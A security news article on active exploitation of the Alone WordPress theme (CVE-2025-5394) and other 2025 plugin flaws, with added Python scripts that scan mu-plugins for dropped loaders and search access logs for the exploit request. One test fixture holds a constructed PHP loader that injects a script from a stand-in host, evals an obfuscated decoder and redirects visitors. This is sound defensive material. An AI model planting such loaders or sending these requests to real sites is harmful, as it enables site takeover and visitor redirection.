Hackers Take Advantage of Major Vulnerability in WordPress Theme Globally


A critical Remote Code Execution (RCE) vulnerability, CVE‑2025‑5394, has been identified in the Alone Charity Multipurpose WordPress Theme, affecting versions up to and including 7.8.3. The theme's plugin-installer AJAX action does not verify that the caller is an authenticated, authorised user, so an unauthenticated request can upload and install an arbitrary plugin ZIP, which amounts to code execution on the server. The flaw is under active exploitation.

Reports indicate that over 120,000 exploit attempts have been documented against more than 9,000 vulnerable websites. Attackers use the unauthenticated upload to plant a malicious plugin and then run arbitrary PHP on the site.

Compounding the situation, a second flaw in the same theme, CVE‑2025‑5393, allows arbitrary file deletion, which makes full site takeover easier (deleting wp-config.php, for example, drops the site back into the installer). In some instances these vulnerabilities have been chained with the Bears Backup plugin RCE (CVE‑2025‑5396), a plugin bundled with the theme, giving attackers still deeper access.

Other High-Profile WordPress Exploits in 2025

Security researchers note that the Alone theme campaign is one instance among many recent attacks of similar severity. In the first months of 2025, attackers exploited at least four prominent plugins and themes whose critical vulnerabilities were disclosed and fixed in 2024 but remained unpatched on many sites:

  • WordPress Automatic Plugin (CVE‑2024‑27956): unauthenticated SQL injection in the plugin's CSV export handler, with over 6,500 blocked attempts documented.
  • Startklar Elementor Addons (CVE‑2024‑4345): an unauthenticated arbitrary file upload that lets attackers install plugins of their choosing and drop backdoors.
  • Bricks Theme (CVE‑2024‑25600): unauthenticated RCE through the theme's /wp-json/bricks/v1/render_element REST route, which executed attacker-supplied PHP.
  • GiveWP Donation Plugin (CVE‑2024‑8353): PHP object injection through donation-form fields, leading to full site compromise.

Newly disclosed plugin vulnerabilities in 2025 include:

  • Post SMTP Plugin (CVE‑2025‑24000): broken access control that exposes email logs to low-privileged users; because password-reset emails land in those logs, it also enables unauthorized admin password resets. An estimated 160,000 sites remain unpatched.
  • BuddyBoss Platform Pro (CVE‑2025‑1909): an authentication bypass in the Apple OAuth flow that allows impersonation of privileged users.
  • PGS Core Plugin (CVE‑2025‑0855): PHP object injection in versions up to 5.8.0.
  • PeproDev Ultimate Profile Solutions (CVE‑2025‑3844): an authentication bypass granting admin login without valid credentials.
  • Simple Payment, FunnelKit, Custom APIs and the Golo Travel theme (CVE‑2025‑4334, ‑6065, ‑4973, ‑1562, ‑5486, ‑5701): a batch of privilege-escalation and arbitrary-file-deletion flaws.

Widespread Impacts and Emerging Attack Tactics

More than 20,000 WordPress websites have been compromised through backdoors hidden in the wp-content/mu-plugins directory. WordPress auto-loads every PHP file placed there with no activation step, and such files cannot be deactivated from the dashboard, so a dropped loader runs on every request and is easy to overlook in a routine plugin audit. The loaders inject malicious JavaScript into pages to redirect visitors and keep a foothold for the attacker.
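The mu-plugins persistence described above can be triaged with a short script. The following is an added example written for this article, not code from the original source or from any of the named plugins: it lists every top-level file in a mu-plugins directory and flags common obfuscation and injection markers. The sample directory, its file names and their contents are constructed here, and the marker list is a starting point rather than a complete signature set.

```python
"""Triage wp-content/mu-plugins for dropped loader files.

WordPress auto-loads every top-level .php file in mu-plugins with no
activation step, so a file dropped there runs on every request. This
script lists those files and flags common obfuscation and injection
markers. The directory, file names and contents in build_sample_dir()
are constructed for this example, not taken from a real compromise.
"""
import os
import re
import tempfile

# Markers often seen in dropped PHP loaders. A hit means "look at this file",
# not "compromised": legitimate code can call base64_decode too.
SUSPICIOUS_PATTERNS = {
    "eval_call":     re.compile(r"\beval\s*\(", re.I),
    "decode_chain":  re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "dynamic_call":  re.compile(r"\$[A-Za-z_]\w*\s*\("),                   # $f(...) variable-function dispatch
    "remote_script": re.compile(r"<script[^>]+src=[\"']https?://", re.I),  # visitor-facing JS injection
    "long_b64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}

def scan_mu_plugins(mu_dir):
    """Return {filename: [marker, ...]} for every top-level regular file.

    .php files are matched against SUSPICIOUS_PATTERNS. Anything else at the
    top level is reported as unexpected: WordPress does not load it, but a
    .js or .txt file sitting there is still something nobody put in place
    knowingly. Clean .php files get an empty list so the operator can confirm
    each one is expected."""
    findings = {}
    for name in sorted(os.listdir(mu_dir)):
        path = os.path.join(mu_dir, name)
        if not os.path.isfile(path):
            continue
        if not name.lower().endswith(".php"):
            findings[name] = ["unexpected_non_php"]
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            body = fh.read()
        findings[name] = [m for m, rx in SUSPICIOUS_PATTERNS.items() if rx.search(body)]
    return findings

def flagged_files(findings):
    """Names that need a human look, in sorted order."""
    return sorted(n for n, hits in findings.items() if hits)

# --- constructed sample directory ---------------------------------------
BENIGN = (
    "<?php\n"
    "// site-specific tweak kept as a must-use plugin\n"
    "add_filter('xmlrpc_enabled', '__return_false');\n"
)
# A loader of the kind the article describes: injects a remote script into
# every page and hides its payload behind a split function name plus eval.
DROPPED = (
    "<?php\n"
    "add_action('wp_head', function () {\n"
    "    echo '<script src=\"https://cdn.example.invalid/x.js\"></script>';\n"
    "});\n"
    "$k = 'ba' . 'se64_decode';\n"
    "eval($k('" + "QUJDRA" * 40 + "'));\n"
)

def build_sample_dir():
    """Write the constructed files into a fresh temp dir and return its path."""
    d = tempfile.mkdtemp(prefix="mu-plugins-")
    for name, body in (("disable-xmlrpc.php", BENIGN),
                       ("index.php", DROPPED),            # innocuous-looking name
                       ("loader.js", "location.href='https://cdn.example.invalid/';")):
        with open(os.path.join(d, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return d

if __name__ == "__main__":
    results = scan_mu_plugins(build_sample_dir())
    for name, hits in results.items():
        print(f"{name:22} {'FLAG ' + ', '.join(hits) if hits else 'no markers (confirm expected)'}")
```

Note what the sample shows: splitting `base64_decode` into two string literals defeats the plain `decode_chain` signature, but the `eval`, the variable-function call and the long base64 blob still give the file away. Point `scan_mu_plugins()` at a real `wp-content/mu-plugins` directory and treat every listed file, flagged or not, as something to account for.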

A supply-chain compromise of the Gravity Forms plugin in July 2025 distributed malware through the plugin's official download channel, affecting users who obtained versions 2.9.11.1 and 2.9.12 during the compromise window.

The long-running DollyWay campaign, active since 2016, continues to redirect traffic from compromised sites to scam and adware domains, gaining entry through a rotating set of plugin and theme vulnerabilities.

Urgent Security Recommendations

  • Update the Alone theme to version 7.8.5 or later without delay.
  • Examine web server access logs for POST requests to /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin; a request the server answered with 200 warrants a full plugin and user audit, not just a block rule.
  • Patch or disable plugins and themes with known critical CVEs immediately.
  • Review admin-ajax.php request logs for other actions you do not recognise, since the same missing-check pattern recurs across plugins.
  • Review administrator accounts and remove any you did not create.
  • Inspect wp-content/mu-plugins for PHP files you did not place there and for the JavaScript they inject; files in that directory load automatically without activation.
  • Deploy a web application firewall, enforce multi-factor authentication for privileged accounts, and alert on new plugin installations.
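The log checks above can be scripted. This is an added example written for this article, not a tool from the original source or from the theme vendor: it parses access-log lines in the common combined format, extracts the admin-ajax action from the request path, lists POSTs to a watchlisted action together with the HTTP status the server returned, and summarises which actions each source IP hit. The log lines, IP addresses and timestamps are constructed for the example; only the action name comes from the advisory.

```python
"""Triage an access log for the Alone theme exploit path and summarise
which admin-ajax.php actions are being hit, and by whom.

The request signature (POST to /wp-admin/admin-ajax.php with
action=alone_import_pack_install_plugin) is the one named in the
recommendations above. The log lines in SAMPLE_LOG are constructed.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache/Nginx "combined" format:
#   ip - user [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Actions whose appearance from the open internet is itself suspicious.
# Only this one comes from the advisory text; extend it as you confirm others.
WATCHLIST = {"alone_import_pack_install_plugin"}

def parse_line(line):
    """Return the named fields of one combined-format line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def ajax_action(path):
    """Return the admin-ajax action named in the query string, or None
    if the path is not admin-ajax.php (works under sub-path installs too)."""
    parts = urlsplit(path)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    return parse_qs(parts.query).get("action", [None])[0]

def triage(lines, watchlist=WATCHLIST):
    """Return (hits, summary).

    hits:    dicts for POSTs to a watchlisted action, with the status the
             server returned, so 200 (accepted) stands out from 403 (blocked).
    summary: {action: Counter({ip: n})} for every admin-ajax action seen."""
    hits = []
    summary = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        action = ajax_action(rec["path"])
        if action is None:
            continue
        summary[action][rec["ip"]] += 1
        if rec["method"] == "POST" and action in watchlist:
            hits.append({"ip": rec["ip"], "time": rec["time"],
                         "action": action, "status": int(rec["status"])})
    return hits, dict(summary)

def accepted_hits(hits):
    """Attempts the origin answered 2xx: these need a plugin-directory and
    admin-user audit, not just a firewall rule."""
    return [h for h in hits if 200 <= h["status"] < 300]

# --- constructed sample log (RFC 5737 documentation addresses) ------------
SAMPLE_LOG = """\
203.0.113.7 - - [28/Jul/2025:03:14:02 +0000] "POST /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [28/Jul/2025:03:14:05 +0000] "GET /wp-login.php HTTP/1.1" 200 4101 "-" "python-requests/2.31"
198.51.100.4 - - [28/Jul/2025:03:20:11 +0000] "POST /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin HTTP/1.1" 403 233 "-" "curl/8.4.0"
192.0.2.10 - - [28/Jul/2025:09:02:44 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 71 "https://example.invalid/wp-admin/" "Mozilla/5.0"
192.0.2.10 - - [28/Jul/2025:09:03:10 +0000] "GET /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin HTTP/1.1" 400 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits, summary = triage(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"{h['time']}  {h['ip']:15}  {h['status']}  {h['action']}")
    print("\nadmin-ajax actions seen:")
    for action, by_ip in sorted(summary.items()):
        print(f"  {action}: {dict(by_ip)}")
```

Replace `SAMPLE_LOG.splitlines()` with an open log file to run it for real. One caveat: admin-ajax.php reads the action from the POST body as well as from the query string, and access logs record only the request line, so a clean result here does not prove the site was never hit. Corroborate with modification times under wp-content/plugins and with the administrator list.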

Unpatched plugins and themes remain the WordPress ecosystem's largest exposure. Throughout 2024 and 2025, attackers have exploited many critical vulnerabilities within 24 hours of public disclosure, using automated, AI-assisted scanners to find vulnerable sites at scale.

Source link: Techjuice.pk.


Reported By

RS Web Solutions
